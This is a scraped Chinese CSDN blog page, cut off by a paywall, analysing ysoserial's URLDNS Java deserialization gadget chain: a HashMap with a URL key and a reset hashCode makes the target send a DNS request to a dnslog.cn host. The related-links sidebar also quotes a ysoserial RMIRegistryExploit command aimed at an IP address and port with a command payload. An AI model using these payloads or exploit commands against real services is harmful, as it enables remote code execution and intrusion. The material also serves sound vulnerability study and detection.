Java反序列化之ysoserial URLDNS模块分析,java迭代器实现原理

最新推荐文章于 2024-04-10 15:14:14 发布
最新推荐文章于 2024-04-10 15:14:14 发布
阅读量171 收藏
点赞数
分类专栏: 程序员 文章标签: 面试 java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64867092/article/details/122233660
版权

由于HashMap中重写了writeObject方法,因此在进行序列化操作时,执行的序列化方法是HashMap中的writeObject方法,具体如下:

先执行默认的序列化操作:

接着 遍历HashMap,对HashMap中的key,value进行序列化。

综上所述,梳理下ysoserial payload,URLDNS 序列化的整个过程:

  • 首先 ysoserial 通过反射的方式,根据全限定类名 ysoserial.payloads.URLDNS ,获取对应的Class类对象,并通过Class类对象的 newInstance() 方法,获取URLDNS对象。

  • 接着执行URLDNS对象中的getObject方法。

  • 在getObject方法中,创建了URLStreamHandler 对象 URLStreamHandler handler = new SilentURLStreamHandler(); ,该对象会被URL对象引用。

  • 创建HashMap对象 HashMap ht = new HashMap(); ,URL对象 URL u = new URL(null, "http://lyxhh.dnslog.cn", handler); 。

  • 将URL对象作为HashMap中的Key,DNSLOG的地址作为HashMap中的值 HashMap.put(u, "http://lyxhh.dnslog.cn");

  • 通过反射的方式 Reflections.setFieldValue(u, "hashCode", -1); ,设置URL对象中的成员变量hashCode值为-1。

  • 返回HashMap对象。

  • 然后对HashMap对象进行序列化操作 Serializer.serialize(HashMap object, out);

整个序列化过程中,有几个问题: 1、为什么要创建URLStreamHandler 对象,URL对象中默认的URLStreamHandler 对象不香吗。 2、为什么要设置URL对象中的成员变量hashCode值为-1。

反序列化分析

读取上述操作生成的 dnslog.ser 文件,执行反序列化,触发DNSLOG请求:

为什么HashMap的反序列化过程会发送DNSLOG请求呢?

在进行反序列化操作时,由于HashMap中重写了readObject方法,因此执行的反序列化方法是HashMap中的read

最低0.47元/天 解锁文章
m0_64867092
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java反序列化ysoserial URLDNS模块分析,用微课学java高级开发
m0_64867092的博客
12-20 579
URLStreamHandler handler = new SilentURLStreamHandler(); 创建了URLStreamHandler对象,该对象的作用,后面我们会详细说到。 接着: HashMap ht = new HashMap(); 创建了HashMap对象: URL u = new URL(null, “http://lyxhh.dnslog.cn”, handler); URL对象: ht.put(u, “http://lyxhh.dnslog.cn”); 将URL对象作为Has
反序列化测试工具 ysoserial-master-v0.0.5 打包
05-21
用法 java -cp ysoserial-master-v0.0.5 ysoserial.exploit.RMIRegistryExploit 192.168.192.118 1099 CommonsCollections1 "notepad.exe"
ysoserial之URLDNS
weixin_40151476的博客
03-04 899
URLDNS的利用链如下,这里直接引用p牛的,p牛牛p。
Java反序列化ysoserial URLDNS模块分析,工厂是怎么面试
最新发布
m0_60634927的博客
04-10 412
谈到面试,其实说白了就是刷题刷题刷题,天天作死的刷。。。。。为了准备这个“金三银四”的春招,狂刷一个月的题,狂补超多的漏洞知识,像这次美团面试问的算法、数据库、Redis、设计模式等这些题目都是我刷到过的并且我也将自己刷的题全部整理成了PDF或者Word文档(含详细答案解析)66个Java面试知识点架构专题(MySQL,Java,Redis,线程,并发,设计模式,Nginx,Linux,框架,微服务等)+大厂面试题详解(百度,阿里,腾讯,华为,迅雷,网易,中兴,北京中软等)算法刷题(PDF)
java安全——ysoserial工具URLDNS分析
网络安全
09-08 1634
本篇我们将学习ysoserial工具的URLDNS链,相对于前面学习的CC链来说,URLDNS链就比较简单了。 URLDNSysoserial工具用于检测是否存在Java反序列化漏洞的一个利用链,通过URLDNS利用链可以发起一次DNS查询请求,从而可以验证目标站点是否存在反序列化漏洞,并且该利用链任何不需要第三方依赖,也没有JDK版本的限制。 但是URLDNS利用链也只能用于发起DNS查询请求,也不能做其他事情,因此URLDNS链更多的是用于POC检测。 有了前面的基础,这里直接上URLD
java反序列化工具ysoserial分析
weixin_30753873的博客
10-26 851
0x00 前言关于java反序列化漏洞的原理分析,基本都是在分析使用Apache Commons Collections这个库,造成的反序列化问题。然而,在下载老外的ysoserial工具并仔细看看后,我发现了许多值得学习的知识。至少能学到如下内容:不同反序列化payload玩法灵活运用了反射机制和动态代理机制构造POCjava反序列化不仅是有Apache Commons Collect...
109-Java反序列化ysoserial URLDNS模块分析.pdf
09-20
Java 反序列化ysoserial URLDNS 模块分析 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,利用 ysoserial 工具可以对其进行攻击。ysoserial 是一个 Java 反序列化漏洞利用工具,提供了多种 payload,可以对...
Java反序列化入门之URLDNS链1
08-03
本文将深入探讨Java反序列化的基本概念、相关方法、以及如何利用ysoserial工具进行漏洞利用,特别关注URLDNS链的原理和构建。 首先,Java反序列化是指将已序列化的对象数据恢复为原来的对象状态。在Java中,序列化...
JAVA序列化和反序列化的底层实现原理解析
08-25
JAVA序列化和反序列化的底层实现原理解析 一、基本概念 JAVA序列化是指把Java对象转换为字节序列的过程,而Java反序列化是指把字节序列恢复为Java对象的过程。序列化是把对象转换成有序字节流,以便在网络上传输...
java反序列化 ysoserial|ysoserial-master-ff59523eb6-1.jar
12-10
帮助理解java反序列化漏洞的工具,一般还需配套工具:SerializationDumper-v1.13、DeserLab以及抓包分析工具
Java实现序列化与反序列化的简单示例
09-02
Java序列化与反序列化Java编程中一个重要的概念,它允许我们将Java对象转换为字节序列,以便存储或在网络中传输。这个过程对于数据持久化、远程对象传输以及跨平台交互具有重要意义。 1. Java序列化: Java序列化...
ysoserial下载
12-26
java反序列化漏洞检测工具,可以自动生成playload,测试用的 有需要的同学拿去用
反序列化工具ysoserial使用介绍
热门推荐
weixin_34275734的博客
08-10 2万+
反序列化工具ysoserial使用介绍 0x00 ysoserial是什么? ysoserial集合了各种java反序列化payload;下载地址:https://github.com/angelwhu/ysoserial 0x01 基本使用方法 在公网vps上执行: java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit....
ysoserial java 反序列化 Groovy1
whatday的专栏
06-23 1849
ysoserial简介 ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload; 由于其中部分payload使用到的低版本JDK中的类,所以建议自己私下分析学习时使用低版本JDK JDK版本建议在1.7u21以下。 此篇文章为java反序列化系列文章的第一篇,后续会以ysoserial这款工具为中心,挨个的去分析其中的反序列化payload和gadget,讲完该工具后会继续对工具中没有的java 反序列化漏洞进行讲解,例如 FastJs
ysoserial exploit/JRMPListener原理剖析
hldfight
03-19 2253
ysoserial exploit/JRMPListener原理剖析0 前言1 payloads/JRMPClient1.1 Externalizable1.2 生成payload1.3 gadget链分析2 exploit/JRMPListener3 总结 0 前言 上一篇文章讲了ysoserial exploit/JRMPClient的原理,本篇接着讲一下ysoserial exploit/J...
ysoserial URLDNS解析
phantom的博客
09-04 354
第一篇文章
ysoserial exploit/JRMPClient原理剖析
hldfight
03-15 2861
0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是: 1、先往存在漏洞的服务器发送payloads/JRMPLIstener,使服务器反序列化该gadget后,会开启一个rmi服务并监听在设置的端口 2、然后攻击方在自己的服务器使用exploit/JRMPClient与存在漏洞的服务器...
[JAVA安全]ysoserial_URLDNS分析
cosmoslin的博客
02-09 1681
ysoserial的URLDNS URLDNS Payload 不依赖任何的第三方库 , 通过HashMap类的反序列化可以触发DNS查询 先看代码: public class URLDNS implements ObjectPayload<Object> { public Object getObject(final String url) throws Exception { //Avoid DNS resolution during pa
java url dns_JAVA反序列化-ysoserial-URLDNS
weixin_42557537的博客
02-24 411
前言推荐阅读时间:10min内容-基础向:在IDEA中JAR的三种调试方式Ysoserial工具中URLDNS模块的原理分析POC代码以及Ysoserial的源码分析题外话:最近有一个小伙伴用**x@v.team**的邮箱戳我,已经写好了回件但是由于找不到这个邮箱地址回不回去。莫非用了伪装源地址的骚操作?但是为啥这么做呢emmm…..如果你看到这篇文的话,可以再私戳我认领下回信…..在IDEA中J...
Java序列化和反序列化实现原理是什么?
11-23
Java序列化和反序列化实现原理如下: 1. 序列化:当对象被序列化时,Java运行时系统将对象转换为字节序列,其中包括对象的类、数据和类的属性信息。这些字节可以被传输到其他机器上,然后通过反序列化重构原始对象...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值